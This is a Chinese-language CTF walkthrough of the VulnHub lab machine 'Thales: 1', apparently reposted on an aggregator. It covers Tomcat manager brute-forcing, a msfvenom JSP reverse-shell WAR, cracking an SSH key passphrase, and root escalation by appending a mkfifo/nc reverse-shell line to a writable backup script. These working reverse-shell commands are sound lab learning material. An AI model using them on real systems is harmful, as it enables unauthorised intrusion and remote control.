ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Thales: 1-vulnhub靶场

2022-08-30 09:03:58  阅读:248  来源: 互联网

标签:shell 爆破 tomcat Thales 192.168 vulnhub 私钥 靶场 war


环境信息

靶机:192.168.124.150
攻击机:192.168.124.129

打靶过程

nmap 扫描端口及服务

image

发现开放了 22,8080 端口
访问 8080 是 apache tomcat 欢迎页面

image

目录扫描

目录扫描未发现扫描有用信息
image

tomcat 登录爆破

因为 tomcat 有管理登录页面,于是尝试爆破

image

image

成功爆破出 tomcat 账号密码为 tomcat:role1

上传 war 包反弹 shell

登录后,在 web 应用程序部署界面尝试在上传 war 包反弹 shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.124.129 LPORT=9999 -f war -o revshell.war

image

上传成功后,在应用程序列表中看到已成功部署了 war 后门,点击访问后反弹

image

image

发现 ssh 私钥

在 thales 家目录下发现了两个文件,user.txt 无访问权限,notes.txt 中告诉我们有一个备用脚本在 /usr/local/bin/backup.sh

image

image

image

并且在 thales 家目录下查看所有文件,发现了 ssh 私钥文件

image
image

爆破私钥得到密码

将私钥文件下载到攻击机,利用 ssh2john 将私钥转化为 john 能处理的 SHA 加密的文件,然后进行爆破,得到密码为 vodka06

image

那么 su 到 thales 用户

image

发现了第一个 flag

image

提权

想到给我们的脚本还没用上,查看脚本,该脚本是 root 用户创建的,且我们有读、写、执行权限

image

image

于是插入反弹 shell 命令

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.124.129 6666 >/tmp/f" >> backup.sh

image

攻击机监听一会儿后成功反弹提权至 root

image

获取 flag

image

总结

1.tomcat 登录爆破
2.私钥爆破
3.脚本反弹 shell

标签:shell,爆破,tomcat,Thales,192.168,vulnhub,私钥,靶场,war
来源: https://www.cnblogs.com/r0ure/p/16636598.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有